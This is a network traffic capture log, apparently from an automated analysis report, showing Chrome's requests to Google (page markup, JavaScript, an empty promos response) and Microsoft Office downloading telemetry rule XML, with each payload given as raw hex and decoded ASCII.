2024-11-09 01:47:15 UTC	1378	IN	Data Raw: 20 67 62 5f 6f 64 20 67 62 5f 46 64 20 67 62 5f 6c 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 Data Ascii: gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u00
2024-11-09 01:47:15 UTC	1378	IN	Data Raw: 30 33 63 5c 2f 61 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c Data Ascii: 03c\/a\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\
2024-11-09 01:47:15 UTC	1378	IN	Data Raw: 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 73 76 67 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 Data Ascii: role\u003d\"button\" tabindex\u003d\"0\"\u003e \u003csvg class\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l22
2024-11-09 01:47:15 UTC	1378	IN	Data Raw: 32 2c 32 7a 4d 36 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 32 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 Data Ascii: 2,2zM6,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM12,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1
2024-11-09 01:47:15 UTC	1378	IN	Data Raw: 66 74 5f 70 72 6f 64 75 63 74 5f 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 31 22 2c 22 6c 65 66 74 5f 70 72 6f 64 75 63 74 5f 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 32 22 5d 2c 22 6d 65 6e 75 5f 70 6c 61 63 65 68 6f 6c 64 65 72 5f 6c 61 62 65 6c 22 3a 22 6d 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 33 32 32 2c 33 37 30 30 39 34 39 2c 33 37 30 31 33 38 34 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 Data Ascii: ft_product_control-label1","left_product_control-label2"],"menu_placeholder_label":"menu-content","metadata":{"bar_height":60,"experiment_id":[3700322,3700949,3701384],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else
2024-11-09 01:47:15 UTC	1378	IN	Data Raw: 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2b 5c 22 3a 5c 22 29 7d 3b 5f 2e 52 64 5c 75 30 30 33 64 67 6c 6f 62 61 6c 54 68 69 73 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 5f 2e 53 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d 74 6f 53 74 72 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 7d 7d 3b 5f 2e 54 64 5c 75 30 30 33 64 6e 65 77 20 5f 2e 53 64 28 5c 22 61 62 6f 75 74 3a 69 6e 76 61 6c 69 64 23 7a 43 6c 6f 73 75 72 65 7a 5c 22 29 3b 5f 2e 50 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 6a 68 5c 75 30 30 33 64 61 7d 7d 3b 5f 2e 55 64 5c 75 30 30 33 Data Ascii: 1).toLowerCase()\u003d\u003d\u003da+\":\")};_.Rd\u003dglobalThis.trustedTypes;_.Sd\u003dclass{constructor(a){this.i\u003da}toString(){return this.i}};_.Td\u003dnew _.Sd(\"about:invalid#zClosurez\");_.Pd\u003dclass{constructor(a){this.jh\u003da}};_.Ud\u003
2024-11-09 01:47:15 UTC	390	IN	Data Raw: 61 5c 75 30 30 33 64 61 2e 69 3b 65 6c 73 65 20 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 65 6c 73 65 20 61 5c 75 30 30 33 64 5f 2e 67 65 28 61 29 3b 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 69 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 29 7b 6c 65 74 20 63 2c 64 3b 62 5c 75 30 30 33 64 28 64 5c 75 30 30 33 64 28 63 5c 75 30 30 33 64 5c 22 64 6f 63 75 6d 65 6e 74 5c 22 69 6e 20 62 3f 62 2e 64 6f 63 75 6d 65 6e 74 3a 62 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 29 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 64 2e 63 61 6c 6c 28 63 2c 60 24 7b 61 7d 5b 6e 6f 6e 63 65 5d 60 29 3b 72 65 74 75 72 6e 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 5c 22 5c Data Ascii: a\u003da.i;else throw Error(\"F\");else a\u003d_.ge(a);return a};_.ie\u003dfunction(a,b\u003ddocument){let c,d;b\u003d(d\u003d(c\u003d\"document\"in b?b.document:b).querySelector)\u003d\u003dnull?void 0:d.call(c,`${a}[nonce]`);return b\u003d\u003dnull?\"\
2024-11-09 01:47:15 UTC	520	IN	Data Raw: 32 30 31 0d 0a 6f 62 6a 65 63 74 5c 22 5c 75 30 30 32 36 5c 75 30 30 32 36 74 79 70 65 6f 66 20 61 2e 6c 65 6e 67 74 68 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 6e 75 6d 62 65 72 5c 22 7d 3b 5f 2e 6b 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 72 65 74 75 72 6e 20 5f 2e 41 62 28 61 2c 62 2c 63 2c 21 31 29 21 5c 75 30 30 33 64 5c 75 30 30 33 64 76 6f 69 64 20 30 7d 3b 5f 2e 6c 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 5f 2e 59 64 28 5f 2e 53 63 28 61 2c 62 29 29 7d 3b 5f 2e 53 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 5f 2e 58 64 28 5f 2e 53 63 28 61 2c 62 29 29 7d 3b 5f 2e 54 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 5c 75 30 30 33 Data Ascii: 201object\"\u0026\u0026typeof a.length\u003d\u003d\"number\"};_.ke\u003dfunction(a,b,c){return _.Ab(a,b,c,!1)!\u003d\u003dvoid 0};_.le\u003dfunction(a,b){return _.Yd(_.Sc(a,b))};_.S\u003dfunction(a,b){return _.Xd(_.Sc(a,b))};_.T\u003dfunction(a,b,c\u003
2024-11-09 01:47:15 UTC	1378	IN	Data Raw: 38 30 30 30 0d 0a 73 63 72 69 70 74 3a 29 28 3f 3a 5b 5c 5c 77 2b 2e 2d 5d 2b 3a 7c 5b 5e 3a 2f 3f 23 5d 2a 28 3f 3a 5b 2f 3f 23 5d 7c 24 29 29 2f 69 3b 76 61 72 20 74 65 2c 78 65 2c 70 65 3b 5f 2e 72 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 6e 65 77 20 70 65 28 5f 2e 71 65 28 61 29 29 3a 6e 65 7c 7c 28 6e 65 5c 75 30 30 33 64 6e 65 77 20 70 65 29 7d 3b 5f 2e 73 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 72 69 6e 67 5c 22 3f 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 62 29 3a 62 7d 3b 5f 2e 55 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 5c 75 30 Data Ascii: 8000script:)(?:[\\w+.-]+:\|[^:/?#]*(?:[/?#]\|$))/i;var te,xe,pe;_.re\u003dfunction(a){return a?new pe(_.qe(a)):ne\|\|(ne\u003dnew pe)};_.se\u003dfunction(a,b){return typeof b\u003d\u003d\u003d\"string\"?a.getElementById(b):b};_.U\u003dfunction(a,b){var c\u0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49707	216.58.206.36	443	7364	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:15 UTC	353	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-09 01:47:15 UTC	957	IN	HTTP/1.1 200 OK Version: 693618659 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Sat, 09 Nov 2024 01:47:15 GMT Server: gws Cache-Control: private X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-11-09 01:47:15 UTC	35	IN	Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a Data Ascii: 1d)]}'{"update":{"promos":{}}}
2024-11-09 01:47:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
3	192.168.2.7	49709	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:16 UTC	195	OUT	GET /rules/other-Win32-v19.bundle HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:16 UTC	492	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:16 GMT Content-Type: text/plain Content-Length: 218853 Connection: close Vary: Accept-Encoding Cache-Control: public Last-Modified: Fri, 08 Nov 2024 03:28:08 GMT ETag: "0x8DCFFA55D7922DF" x-ms-request-id: 8718d627-b01e-00ab-44bd-31dafd000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014716Z-16547b76f7fkcrm9hC1DFWxdag0000000af000000000r642 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:16 UTC	15892	IN	Data Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20 Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
2024-11-09 01:47:16 UTC	16384	IN	Data Raw: 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 Data Ascii: <V V="400" T="I32" /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V
2024-11-09 01:47:16 UTC	16384	IN	Data Raw: 32 30 76 33 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 Data Ascii: 20v3+<?xml version="1.0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="T
2024-11-09 01:47:16 UTC	16384	IN	Data Raw: 20 54 3d 22 32 22 20 46 3d 22 41 76 65 72 61 67 65 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d Data Ascii: T="2" F="Average" /> </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F=
2024-11-09 01:47:16 UTC	16384	IN	Data Raw: 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a Data Ascii: alse"> <C> <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C>
2024-11-09 01:47:16 UTC	16384	IN	Data Raw: 20 49 3d 22 31 39 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 Data Ascii: I="19" O="false" N="Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="Cleanup
2024-11-09 01:47:16 UTC	16384	IN	Data Raw: 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 Data Ascii: </L> <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R>
2024-11-09 01:47:16 UTC	16384	IN	Data Raw: 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 Data Ascii: </O> </F> </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C>
